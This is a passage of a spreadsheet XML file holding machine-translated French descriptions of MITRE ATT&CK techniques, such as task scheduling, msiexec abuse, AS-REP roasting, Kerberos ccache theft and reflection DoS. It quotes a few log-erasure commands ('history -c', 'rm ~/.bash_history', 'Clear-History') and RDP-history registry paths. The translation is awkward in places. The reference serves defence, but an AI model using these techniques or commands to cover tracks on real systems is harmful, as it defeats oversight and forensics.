Notez que lorsque des systèmes d’orchestration de conteneurs sont déployés dans des environnements cloud, comme avec Google Kubernetes Engine, Amazon Elastic Kubernetes Service et Azure Kubernetes Service, les attributions de contrôle d’accès en fonction du rôle (RBAC) basées sur le cloud ou les politiques ABAC peuvent souvent être utilisées à la place ou en plus des attributions d’autorisations locales. (Citation : Google Cloud Kubernetes IAM)(Référence : Rôles AWS EKS IAM pour les comptes de service)(Citation : Comptes de service Microsoft Azure Kubernetes Service) Dans ce cas, cette technique peut être utilisée conjointement avec [Rôles cloud supplémentaires](https://attack.mitre.org/techniques/T1098/003).
https://attack.mitre.org/techniques/T1098/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de la fonctionnalité de planification des tâches pour faciliter l’exécution initiale ou récurrente de code malveillant. Des utilitaires existent dans tous les principaux systèmes d’exploitation pour planifier l’exécution de programmes ou de scripts à une date et une heure spécifiées. Une tâche peut également être planifiée sur un système distant, à condition que l’authentification appropriée soit respectée (par exemple, RPC et partage de fichiers et d’imprimantes dans les environnements Windows). La planification d’une tâche sur un système distant peut généralement nécessiter d’être membre d’un administrateur ou d’un groupe privilégié sur le système distant. (Citation : Sécurité du planificateur de tâches TechNet)
Les adversaires peuvent utiliser la planification des tâches pour exécuter des programmes au démarrage du système ou de manière planifiée pour la persistance. Ces mécanismes peuvent également être utilisés de manière abusive pour exécuter un processus dans le contexte d’un compte spécifié (par exemple, un compte avec des autorisations/privilèges élevés). À l’instar de [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), les adversaires ont également abusé de la planification des tâches pour masquer potentiellement une exécution unique dans le cadre d’un processus système approuvé. (Citation : ProofPoint Serpent)
https://attack.mitre.org/techniques/T1053</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution de charges utiles malveillantes msiexec.exe à proxy Msiexec.exe est l’utilitaire de ligne de commande pour Windows Installer et est donc généralement associé à l’exécution de packages d’installation (.msi). (Citation : Microsoft msiexec) Le binaire Msiexec.exe peut également être signé numériquement par Microsoft.
Les adversaires peuvent abuser de msiexec.exe pour lancer des fichiers MSI accessibles localement ou par le réseau. Msiexec.exe pouvez également exécuter des DLL.(Citation : LOLBAS Msiexec)(Citation : TrendMicro Msiexec Feb 2018) Comme il peut être signé et natif sur les systèmes Windows, msiexec.exe peut être utilisé pour contourner les solutions de contrôle d’applications qui ne tiennent pas compte de son abus potentiel. Msiexec.exe’exécution peut également être élevée au rang de privilèges SYSTEM si la stratégie &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; est activée. (Citation : Microsoft AlwaysInstallElevated 2018)
https://attack.mitre.org/techniques/T1218/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les dépendances d’approbation du réseau de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les approbations de réseau peuvent inclure divers détails, y compris des organisations/domaines secondaires ou tiers (par exemple, des fournisseurs de services gérés, des sous-traitants, etc.) qui ont un accès réseau connecté (et potentiellement élevé).
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Les informations sur les fiducies de réseau peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)). (Citation : Pentesting AD Forests) La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou d’accès initial (ex : [Fiable Relation](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1590/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de provoquer un déni de service (DoS) en reflétant un volume élevé de trafic réseau à une cible. Ce type de DoS réseau tire parti d’un serveur intermédiaire tiers qui héberge et répondra à une adresse IP source usurpée donnée. Ce serveur tiers est communément appelé réflecteur. Un adversaire réalise une attaque par réflexion en envoyant des paquets à des réflecteurs avec l’adresse usurpée de la victime. À l’instar des Direct Network Floods, plusieurs systèmes peuvent être utilisés pour mener l’attaque, ou un botnet peut être utilisé. De même, un ou plusieurs réflecteurs peuvent être utilisés pour concentrer le trafic sur la cible. (Citation : Cloudflare ReflectionDoS mai 2017) Cette attaque par déni de service réseau peut également réduire la disponibilité et la fonctionnalité du ou des systèmes et du réseau ciblés.
Les attaques par réflexion tirent souvent parti des protocoles avec des réponses plus importantes que les requêtes afin d’amplifier leur trafic, ce que l’on appelle communément une attaque par amplification par réflexion. Les adversaires peuvent être en mesure de générer une augmentation du volume du trafic d’attaque supérieure de plusieurs ordres de grandeur aux requêtes envoyées aux amplificateurs. L’ampleur de cette augmentation dépendra de nombreuses variables, telles que le protocole en question, la technique utilisée et les serveurs d’amplification qui produisent réellement l’amplification du volume d’attaque. Deux protocoles importants qui ont permis l’amplification de réflexion sont DNS(Citation : Cloudflare DNSamplficationDoS) et NTP(Citation : Cloudflare NTPamplifciationDoS), bien que l’utilisation de plusieurs autres dans la nature ait été documentée. (Citation : Arbor AnnualDoSreport janvier 2018)  En particulier, le protocole memcache s’est avéré être un protocole puissant, avec des tailles d’amplification allant jusqu’à 51 200 fois le paquet demandeur. (Citation : Cloudflare Memcrashed février 2018)
https://attack.mitre.org/techniques/T1498/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer des bibliothèques de liens dynamiques (DLL) malveillantes de filtre de mot de passe dans le processus d’authentification pour acquérir les informations d’identification de l’utilisateur au fur et à mesure de leur validation. 
Les filtres de mots de passe Windows sont des mécanismes d’application de politiques de mots de passe pour les comptes de domaine et locaux. Les filtres sont implémentés sous forme de DLL contenant une méthode pour valider les mots de passe potentiels par rapport aux politiques de mot de passe. Les DLL de filtre peuvent être positionnées sur des ordinateurs locaux pour les comptes locaux et/ou des contrôleurs de domaine pour les comptes de domaine. Avant d’enregistrer de nouveaux mots de passe dans le gestionnaire de comptes de sécurité (SAM), l’autorité de sécurité locale (LSA) demande la validation de chaque filtre enregistré. Les modifications potentielles ne peuvent pas prendre effet tant que chaque filtre enregistré n’a pas été validé. 
Les adversaires peuvent enregistrer des filtres de mots de passe malveillants pour collecter des informations d’identification sur des ordinateurs locaux et/ou des domaines entiers. Pour effectuer une validation correcte, les filtres doivent recevoir des informations d’identification en texte brut de la part du LSA. Un filtre de mot de passe malveillant recevrait ces informations d’identification en texte brut chaque fois qu’une demande de mot de passe est effectuée. (Citation : Filtres de mots de passe Carnal Ownage septembre 2013)
https://attack.mitre.org/techniques/T1556/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des composants des services Terminal Server pour permettre un accès permanent aux systèmes. Les services Terminal Server de Microsoft, renommés Services Bureau à distance dans certains systèmes d’exploitation Windows Server à partir de 2022, permettent les connexions de terminal à distance aux hôtes. Les services Terminal Server permettent aux serveurs de transmettre une interface utilisateur graphique complète et interactive aux clients via RDP. (Citation : Services de bureau à distance de Microsoft)
[Service Windows]Les (https://attack.mitre.org/techniques/T1543/003) qui sont exécutés en tant que processus « générique » (ex : &lt;code&gt;svchost.exe&lt;/code&gt;) chargent le fichier DLL du service, dont l’emplacement est stocké dans une entrée de registre nommée &lt;code&gt;ServiceDll&lt;/code&gt;. (Citation : Principes fondamentaux des services système Microsoft) Le fichier &lt;code&gt;termsrv.dll&lt;/code&gt;, généralement stocké dans ' %SystemRoot %\System32\', est la valeur &lt;code&gt;ServiceDll&lt;/code&gt; par défaut pour les services Terminal Server dans 'HKLM\System\CurrentControlSet\services\TermService\Parameters\'.
Les adversaires peuvent modifier et/ou remplacer la DLL des services Terminal Server pour permettre un accès persistant aux hôtes victimisés. (Citation : James TermServ DLL) Des modifications peuvent être apportées à cette DLL pour exécuter des charges utiles arbitraires (tout en préservant potentiellement &lt;code&gt;les fonctionnalités termsrv.dll&lt;/code&gt; normales) ainsi que pour activer simplement des fonctionnalités abusives des services Terminal Server. Par exemple, un adversaire peut activer des fonctionnalités telles que des sessions simultanées [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) en corrigeant le fichier &lt;code&gt;termsrv.dll&lt;/code&gt; ou en modifiant la valeur &lt;code&gt;ServiceDll&lt;/code&gt; pour qu’elle pointe vers une DLL qui offre une fonctionnalité RDP accrue. (Citation : Windows OS Hub RDP)(Citation : RDPWrap Github) Sur un système d’exploitation Windows non serveur, cette fonctionnalité accrue peut également permettre à un adversaire d’éviter les invites des services Terminal Server qui avertissent/déconnectent les utilisateurs d’un système lorsqu’une nouvelle session RDP est créée.
https://attack.mitre.org/techniques/T1505/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser d’AppleScript pour l’exécution. AppleScript est un langage de script macOS conçu pour contrôler les applications et certaines parties du système d’exploitation via des messages inter-applications appelés AppleEvents. (Citation : Apple AppleScript) Ces messages AppleEvent peuvent être envoyés indépendamment ou facilement scriptés avec AppleScript. Ces événements peuvent localiser les fenêtres ouvertes, envoyer des frappes au clavier et interagir avec presque toutes les applications ouvertes localement ou à distance.
Les scripts peuvent être exécutés à partir de la ligne de commande via &lt;code&gt;osascript /path/to/script&lt;/code&gt; ou &lt;code&gt;osascript -e « script here ».&lt;/code&gt; Outre la ligne de commande, les scripts peuvent être exécutés de nombreuses façons, notamment les règles de messagerie, les alarmes Calendar.app et les flux de travail Automator. Les AppleScripts peuvent également être exécutés en tant que scripts shell en texte brut en ajoutant &lt;code&gt;# !/usr/bin/osascript&lt;/code&gt; au début du fichier de script. (Citation : SentinelOne AppleScript)
Les AppleScripts n’ont pas besoin d’appeler &lt;code&gt;osascript&lt;/code&gt; pour s’exécuter. Cependant, ils peuvent être exécutés à partir de binaires mach-O à l’aide du &lt;code&gt;NSAppleScript&lt;/code&gt; ou &lt;code&gt;OSAScript&lt;/code&gt; de macOS [API native https://attack.mitre.org/techniques/T1106, qui exécutent tous deux du code indépendamment de l’utilitaire de ligne de commande &lt;code&gt;/usr/bin/osascript&lt;/code&gt;.
Les adversaires peuvent abuser d’AppleScript pour exécuter divers comportements, tels que l’interaction avec une connexion SSH ouverte, le déplacement vers des machines distantes et même la présentation aux utilisateurs de fausses boîtes de dialogue. Ces événements ne peuvent pas démarrer les applications à distance (ils peuvent les démarrer localement), mais ils peuvent interagir avec les applications si elles s’exécutent déjà à distance. Sur macOS 10.10 Yosemite et versions ultérieures, AppleScript a la capacité d’exécuter des [API natives](https://attack.mitre.org/techniques/T1106), qui nécessiteraient autrement une compilation et une exécution dans un format de fichier binaire mach-O. (Citation : SentinelOne macOS Red Team) Comme il s’agit d’un langage de script, il peut également être utilisé pour lancer des techniques plus courantes, telles qu’un shell inverse via [Python](https://attack.mitre.org/techniques/T1059/006). (Citation : Les macro-malwares ciblent les Mac)
https://attack.mitre.org/techniques/T1059/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des extensions de navigateur Internet pour établir un accès persistant aux systèmes des victimes. Les extensions de navigateur ou les plugins sont de petits programmes qui peuvent ajouter des fonctionnalités et personnaliser des aspects des navigateurs Internet. Ils peuvent être installés directement ou via la boutique d’applications d’un navigateur et ont généralement accès et autorisations à tout ce que le navigateur peut accéder. (citation : Extension de navigateur Wikipédia)(Citation : Définition des extensions Chrome)
Des extensions malveillantes peuvent être installées dans un navigateur par le biais de téléchargements malveillants sur une boutique d’applications se faisant passer pour des extensions légitimes, par le biais de l’ingénierie sociale ou par un adversaire qui a déjà compromis un système. La sécurité peut être limitée sur les magasins d’applications de navigateur, il n’est donc pas difficile pour les extensions malveillantes de déjouer les scanners automatisés. (Citation : numéros d’extension Chrome malveillants) Selon le navigateur, les adversaires peuvent également manipuler l’URL de mise à jour d’une extension pour installer des mises à jour à partir d’un serveur contrôlé par l’adversaire ou manipuler le fichier de configuration mobile pour installer silencieusement des extensions supplémentaires.
Avant macOS 11, les adversaires pouvaient installer silencieusement des extensions de navigateur via la ligne de commande à l’aide de l’outil de &lt;code&gt;profils&lt;/code&gt; pour installer des fichiers &lt;code&gt;.mobileconfig&lt;/code&gt; malveillants. Dans macOS 11+, l’utilisation de l’outil &lt;code&gt;Profils&lt;/code&gt; ne peut plus installer de profils de configuration, mais les fichiers &lt;code&gt;.mobileconfig&lt;/code&gt; peuvent être plantés et installés avec l’interaction de l’utilisateur. (Citation : extensions chrome xorrior macOS)
Une fois l’extension installée, elle peut accéder à des sites Web en arrière-plan, voler toutes les informations qu’un utilisateur saisit dans un navigateur (y compris les informations d’identification) et être utilisée comme installateur pour un RAT pour la persistance. (Citation : Chrome Extension Crypto Miner)(Citation : Extensions Chrome ICEBRG)(Citation : L’extension Google Chrome du banquier vole des crédits)(Citation : Extension Chrome Catch All)
Il y a également eu des cas de botnets utilisant une porte dérobée persistante via des extensions Chrome malveillantes pour [Command and Control](https://attack.mitre.org/tactics/TA0011). (Référence : Stantinko Botnet)(Citation : Chrome Extension C2 Malware) Les adversaires peuvent également utiliser des extensions de navigateur pour modifier les autorisations et les composants du navigateur, les paramètres de confidentialité et d’autres contrôles de sécurité pour [Defense Evasion](https://attack.mitre.org/tactics/TA0005). (Citation : Browers FriarFox)(Citation : navigateur Adrozek)
https://attack.mitre.org/techniques/T1176</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler les différents services réseau fournis par les systèmes pour effectuer un déni de service (DoS). Les adversaires ciblent souvent la disponibilité des services DNS et Web, mais d’autres ont également été ciblés. (Citation : Arbor AnnualDoSreport janvier 2018) Les logiciels de serveur Web peuvent être attaqués par divers moyens, dont certains s’appliquent généralement tandis que d’autres sont spécifiques au logiciel utilisé pour fournir le service.
Un exemple de ce type d’attaque est connu sous le nom de simple inondation HTTP, où un adversaire envoie un grand nombre de requêtes HTTP à un serveur Web pour le submerger et/ou à une application qui s’exécute par-dessus. Ce flood s’appuie sur le volume brut pour atteindre l’objectif, en épuisant toutes les ressources requises par le logiciel victime pour fournir le service. (Citation : Cloudflare HTTPflood)
Une autre variante, connue sous le nom d’attaque de renégociation SSL, tire parti d’une fonctionnalité de protocole dans SSL/TLS. La suite de protocoles SSL/TLS comprend des mécanismes permettant au client et au serveur de convenir d’un algorithme de cryptage à utiliser pour les connexions sécurisées ultérieures. Si la renégociation SSL est activée, une demande de renégociation de l’algorithme de chiffrement peut être faite. Dans une attaque de renégociation, l’adversaire établit une connexion SSL/TLS, puis procède à une série de demandes de renégociation. Étant donné que la renégociation cryptographique a un coût significatif en cycles de calcul, cela peut avoir un impact sur la disponibilité du service lorsqu’elle est effectuée en volume. (Citation : Arbor SSLDoS avril 2012)
https://attack.mitre.org/techniques/T1499/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent manipuler les composants matériels des produits avant leur réception par un consommateur final dans le but de compromettre les données ou le système. En modifiant le matériel ou le micrologiciel dans la chaîne d’approvisionnement, les adversaires peuvent insérer une porte dérobée dans les réseaux grand public qui peut être difficile à détecter et donner à l’adversaire un degré élevé de contrôle sur le système. Les portes dérobées matérielles peuvent être insérées dans divers appareils, tels que des serveurs, des postes de travail, une infrastructure réseau ou des périphériques.
https://attack.mitre.org/techniques/T1195/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent interagir avec l’interface de programmation d’application (API) native du système d’exploitation pour exécuter des comportements. Les API natives fournissent un moyen contrôlé d’appeler des services de système d’exploitation de bas niveau au sein du noyau, tels que ceux impliquant du matériel/des périphériques, de la mémoire et des processus. (Citation : NT API Windows)(Citation : API du noyau Linux) Ces API natives sont exploitées par le système d’exploitation lors du démarrage du système (lorsque les autres composants du système ne sont pas encore initialisés) ainsi que lors de l’exécution de tâches et de demandes lors d’opérations de routine.
Les adversaires peuvent abuser de ces fonctions de l’API du système d’exploitation comme moyen d’exécuter des comportements. À l’instar de [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), l’API native et sa hiérarchie d’interfaces fournissent des mécanismes permettant d’interagir avec et d’utiliser divers composants d’un système victimisé.
Les fonctions API natives (telles que &lt;code&gt;NtCreateProcess&lt;/code&gt;) peuvent être appelées directement via des appels système / appels système, mais ces fonctionnalités sont également souvent exposées aux applications en mode utilisateur via des interfaces et des bibliothèques. (Citation : Appels système OutFlank)(Citation : Appels système CyberBit)(Citation : Appels système MDSec) Par exemple, des fonctions telles que l’API Windows &lt;code&gt;CreateProcess()&lt;/code&gt; ou GNU &lt;code&gt;fork()&lt;/code&gt; permettront aux programmes et aux scripts de démarrer d’autres processus. (Citation : Microsoft CreateProcess)(Citation : Fourche GNU) Cela peut permettre aux appelants d’API d’exécuter un binaire, d’exécuter une commande CLO, de charger des modules, etc., car des milliers de fonctions API similaires existent pour diverses opérations système. (Citation : Microsoft Win32)(Référence : LIBC)(Citation : GLIBC)
Des frameworks logiciels de niveau supérieur, tels que Microsoft .NET et macOS Cocoa, sont également disponibles pour interagir avec les API natives. Ces frameworks fournissent généralement des wrappers/abstractions de langage aux fonctionnalités de l’API et sont conçus pour la facilité d’utilisation/portabilité du code. (Citation : Microsoft NET)(Citation : Services de base d’Apple)(Citation : MACOS Cocoa)(Citation : Fondation macOS)
Les adversaires peuvent utiliser l’assembleur pour invoquer directement ou indirectement des appels système dans le but de contourner les capteurs défensifs et les signatures de détection telles que les crochets API en mode utilisateur. (Citation : Redops syscalls) Les adversaires peuvent également tenter de falsifier les capteurs et les outils défensifs associés à la surveillance des API, tels que le décrochage des fonctions surveillées via [Désactiver ou modifier les outils](https://attack.mitre.org/techniques/T1562/001).
https://attack.mitre.org/techniques/T1106</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de voler des tickets Kerberos stockés dans des fichiers de cache d’informations d’identification (ou ccache). Ces fichiers sont utilisés pour le stockage à court terme des informations d’identification de session active d’un utilisateur. Le fichier ccache est créé lors de l’authentification de l’utilisateur et permet d’accéder à plusieurs services sans que l’utilisateur ait à saisir à nouveau ses informations d’identification. 
Le fichier &lt;code&gt;de configuration /etc/krb5.conf&lt;/code&gt; et la variable &lt;code&gt;d’environnement KRB5CCNAME&lt;/code&gt; sont utilisés pour définir l’emplacement de stockage des entrées ccache. Sous Linux, les informations d’identification sont généralement stockées dans le répertoire '/tmp' avec un format de nommage 'krb5cc_ %UID %' ou 'krb5.ccache'. Sur macOS, les entrées ccache sont stockées par défaut en mémoire avec un schéma de nommage 'API :{uuid}'. En règle générale, les utilisateurs interagissent avec le stockage des tickets à l’aide &lt;code&gt;de kinit&lt;/code&gt;, qui obtient un ticket d’octroi de ticket (TGT) pour le principal. &lt;code&gt;klist, qui répertorie&lt;/code&gt; les tickets obtenus actuellement conservés dans le cache des identifiants ; et d’autres fichiers binaires intégrés. (Citation : Kerberos GNU/Linux)(Citation : Défense binaire Kerberos Linux)
Les adversaires peuvent collecter des tickets à partir de fichiers ccache stockés sur le disque et s’authentifier en tant qu’utilisateur actuel sans son mot de passe pour effectuer des attaques [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Les adversaires peuvent également utiliser ces tickets pour se faire passer pour des utilisateurs légitimes disposant de privilèges élevés afin d’effectuer [Élévation de privilèges](https://attack.mitre.org/tactics/TA0004). Des outils comme Kekeo peuvent également être utilisés par des adversaires pour convertir des fichiers ccache au format Windows pour plus de [Mouvement latéral](https://attack.mitre.org/tactics/TA0008). Sur macOS, les adversaires peuvent utiliser des outils open source ou le cadre Kerberos pour interagir avec les fichiers ccache et extraire des TGT ou des tickets de service via des API de niveau inférieur. (Citation : SpectorOps Bifrost Kerberos macOS 2019)(Citation : Billets Linux Kerberos)(Citation : Brining MimiKatz à Unix)(Citation : Kekeo)
https://attack.mitre.org/techniques/T1558/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent effacer ou supprimer les preuves de connexions réseau malveillantes afin de nettoyer les traces de leurs opérations. Des paramètres de configuration ainsi que divers artefacts qui mettent en évidence l’historique des connexions peuvent être créés sur un système et/ou dans les journaux d’application à partir de comportements nécessitant des connexions réseau, tels que [Services à distance](https://attack.mitre.org/techniques/T1021) ou [Services à distance externes](https://attack.mitre.org/techniques/T1133). Les défenseurs peuvent utiliser ces artefacts pour surveiller ou analyser les connexions réseau créées par des adversaires.
L’historique des connexions réseau peut être stocké à différents endroits. Par exemple, l’historique de connexion RDP peut être stocké dans les valeurs du registre Windows sous (Citation : Suppression de Microsoft RDP) :
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Par défaut&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers&lt;/code&gt;
Windows peut également stocker des informations sur les connexions RDP récentes dans des fichiers tels que &lt;code&gt;C :\Users\\ %username %\Documents\Default.rdp&lt;/code&gt; et 'C :\Users\ %username %\AppData\Local\Microsoft\Terminal
Client serveur\Cache\'. (Citation : Moran RDPieces) De même, les hôtes macOS et Linux peuvent stocker des informations mettant en évidence l’historique des connexions dans les journaux système (tels que ceux stockés dans « /Library/Logs » et/ou « /var/log/ »). (Citation : Accès au coupable de la pomme)(Citation : FreeDesktop Journal)(Citation : Apple Unified Log Analysis Connexion à distance et partage d’écran)
Les connexions réseau malveillantes peuvent également nécessiter des modifications des applications tierces ou des paramètres de configuration réseau, telles que [Désactiver ou modifier le pare-feu système](https://attack.mitre.org/techniques/T1562/004) ou une altération pour activer [Proxy](https://attack.mitre.org/techniques/T1090). Les adversaires peuvent supprimer ou modifier ces données pour dissimuler des indicateurs et/ou entraver l’analyse défensive.
https://attack.mitre.org/techniques/T1070/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent révéler les informations d’identification des comptes qui ont désactivé la pré-authentification Kerberos par des messages Kerberos [Craquage de mot de passe](https://attack.mitre.org/techniques/T1110/002). (Citation : Harmj0y Roasting AS-REPs janvier 2017) 
La pré-authentification offre une protection contre le [craquage de mot de passe](https://attack.mitre.org/techniques/T1110/002). Lorsque cette option est activée, un utilisateur demandant l’accès à une ressource initie la communication avec le contrôleur de domaine (DC) en envoyant un message de demande de serveur d’authentification (AS-REQ) avec un horodatage chiffré avec le hachage de son mot de passe. Si et seulement si le contrôleur de domaine est en mesure de déchiffrer l’horodatage avec le hachage du mot de passe de l’utilisateur, il enverra alors un message de réponse du serveur d’authentification (AS-REP) contenant le ticket d’octroi de ticket (TGT) à l’utilisateur. Une partie du message AS-REP est signée avec le mot de passe de l’utilisateur. (Citation : Microsoft Kerberos Preauth 2014)
Pour chaque compte trouvé sans pré-authentification, un adversaire peut envoyer un message AS-REQ sans l’horodatage chiffré et recevoir un message AS-REP avec des données TGT qui peuvent être chiffrées à l’aide d’un algorithme non sécurisé tel que RC4. Les données chiffrées récupérées peuvent être vulnérables aux attaques hors ligne [Password Cracking](https://attack.mitre.org/techniques/T1110/002) de la même manière qu’à [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) et exposer des informations d’identification en texte clair. (Citation : Harmj0y Roasting AS-REPs janvier 2017)(Citation : Stealthbits Cracking AS-REP Roasting juin 2019) 
Un compte enregistré dans un domaine, avec ou sans privilèges spéciaux, peut être utilisé de manière abusive pour répertorier tous les comptes de domaine dont la pré-authentification est désactivée à l’aide d’outils Windows tels que [PowerShell](https://attack.mitre.org/techniques/T1059/001) avec un filtre LDAP. L’adversaire peut également envoyer un message AS-REQ pour chaque utilisateur. Si le contrôleur de domaine répond sans erreur, le compte ne nécessite pas de pré-authentification et le message AS-REP contiendra déjà les données chiffrées. (Citation : Harmj0y Roasting AS-REPs janvier 2017)(Citation : Stealthbits Cracking AS-REP Roasting juin 2019)
Les hachages piratés peuvent activer [Persistance](https://attack.mitre.org/tactics/TA0003), [Élévation de privilèges](https://attack.mitre.org/tactics/TA0004) et [Mouvement latéral](https://attack.mitre.org/tactics/TA0008) via l’accès à [Comptes valides](https://attack.mitre.org/techniques/T1078). (Citation : SANS attaquant Kerberos novembre 2014)
https://attack.mitre.org/techniques/T1558/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les serveurs privés virtuels (VPS) tiers qui peuvent être utilisés lors du ciblage. Il existe une variété de fournisseurs de services cloud qui vendent des machines virtuelles/conteneurs en tant que service. Les adversaires peuvent compromettre les VPS achetés par des entités tierces. En compromettant un VPS pour l’utiliser comme infrastructure, les adversaires peuvent rendre difficile le lien physique entre les opérations. (Citation : NSA NCSC Turla OilRig)
La compromission d’un VPS pour une utilisation dans les étapes ultérieures du cycle de vie de l’adversaire, telles que la commande et le contrôle, peut permettre aux adversaires de bénéficier de l’omniprésence et de la confiance associées aux fournisseurs de services cloud de meilleure réputation, ainsi que de celles ajoutées par le tiers compromis.
https://attack.mitre.org/techniques/T1584/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter des commandes et effectuer des tâches malveillantes à l’aide de scripts d’automatisation AutoIT et AutoHotKey. AutoIT et AutoHotkey (AHK) sont des langages de script qui permettent aux utilisateurs d’automatiser les tâches Windows. Ces scripts d’automatisation peuvent être utilisés pour effectuer une grande variété d’actions, telles que cliquer sur des boutons, saisir du texte et ouvrir et fermer des programmes. (Citation : AutoIT)(Citation : AutoHotKey)
Les adversaires peuvent utiliser des scripts AHK ('.ahk') et AutoIT ('.au3') pour exécuter du code malveillant sur le système d’une victime. Par exemple, des adversaires ont utilisé AHK pour exécuter des charges utiles et d’autres logiciels malveillants modulaires tels que des enregistreurs de frappe. Les adversaires ont également utilisé des fichiers AHK personnalisés contenant des logiciels malveillants intégrés comme charges utiles [Phishing](https://attack.mitre.org/techniques/T1566). (Citation : Splunk DarkGate)
Ces scripts peuvent également être compilés en charges utiles exécutables autonomes ('.exe'). (Citation : AutoIT)(Citation : AutoHotKey)
https://attack.mitre.org/techniques/T1059/010</t>
  </si>
  <si>
    <t>Les adversaires peuvent réduire le niveau d’effort requis pour déchiffrer les données transmises sur le réseau en réduisant la force de chiffrement des communications chiffrées. (Citation : Cisco Synful Knock Evolution)
Les adversaires peuvent affaiblir le logiciel de chiffrement d’un périphérique réseau compromis en réduisant la taille de la clé utilisée par le logiciel pour convertir le texte en clair en texte chiffré (par exemple, de centaines ou de milliers d’octets à quelques octets seulement). Par conséquent, les adversaires réduisent considérablement la quantité d’efforts nécessaires pour déchiffrer les informations protégées sans la clé.
Les adversaires peuvent modifier la taille de la clé utilisée et d’autres paramètres de chiffrement à l’aide de commandes spécialisées dans une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduite dans le système via [Modifier l’image système](https://attack.mitre.org/techniques/T1601) pour modifier la configuration du périphérique. (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1600/001</t>
  </si>
  <si>
    <t>En plus d’effacer les journaux système, un adversaire peut effacer l’historique des commandes d’un compte compromis pour dissimuler les actions entreprises lors d’une intrusion. Divers interpréteurs de commandes gardent une trace des commandes que les utilisateurs saisissent dans leur terminal afin que les utilisateurs puissent retracer ce qu’ils ont fait.
Sous Linux et macOS, ces historiques de commandes sont accessibles de différentes manières. Lorsque vous êtes connecté, cet historique de commandes est suivi dans un fichier pointé par la variable &lt;code&gt;d’environnement HISTFILE.&lt;/code&gt; Lorsqu’un utilisateur se déconnecte d’un système, ces informations sont vidées dans un fichier appelé &lt;code&gt;~/.bash_history&lt;/code&gt; dans le répertoire personnel de l’utilisateur. L’avantage est qu’il permet aux utilisateurs de revenir aux commandes qu’ils ont déjà utilisées dans différentes sessions.
Les adversaires peuvent supprimer leurs commandes de ces journaux en effaçant manuellement l’historique (&lt;code&gt;history -c&lt;/code&gt;) ou en supprimant le fichier d’historique bash &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.  
Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour effacer les données de l’historique des commandes (&lt;code&gt;effacer la journalisation&lt;/code&gt; et/ou &lt;code&gt;effacer l’historique&lt;/code&gt;). (Référence : US-CERT-TA18-106A)
Sur les hôtes Windows, PowerShell dispose de deux fournisseurs d’historique des commandes différents : l’historique intégré et l’historique des commandes géré par le module &lt;code&gt;PSReadLine&lt;/code&gt;. L’historique intégré ne suit que les commandes utilisées dans la session en cours. Cet historique de commandes n’est pas disponible pour les autres sessions et est supprimé à la fin de la session.
L’historique des commandes &lt;code&gt;PSReadLine&lt;/code&gt; suit les commandes utilisées dans toutes les sessions PowerShell et les écrit dans un fichier (&lt;code&gt;$env :APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; par défaut). Ce fichier d’historique est disponible pour toutes les sessions et contient tout l’historique passé, car le fichier n’est pas supprimé à la fin de la session. (Citation : Historique des commandes Microsoft PowerShell)
Les adversaires peuvent exécuter la commande PowerShell &lt;code&gt;Clear-History&lt;/code&gt; pour vider l’intégralité de l’historique des commandes d’une session PowerShell en cours. Cependant, cela ne supprimera pas/videra le fichier &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt;. Les adversaires peuvent également supprimer le fichier &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; ou modifier son contenu pour masquer les commandes PowerShell qu’ils ont exécutées. (Citation : audit de commande Sophos PowerShell)(Citation : Sophos PowerShell Command History Forensics)
https://attack.mitre.org/techniques/T1070/003</t>
  </si>
  <si>
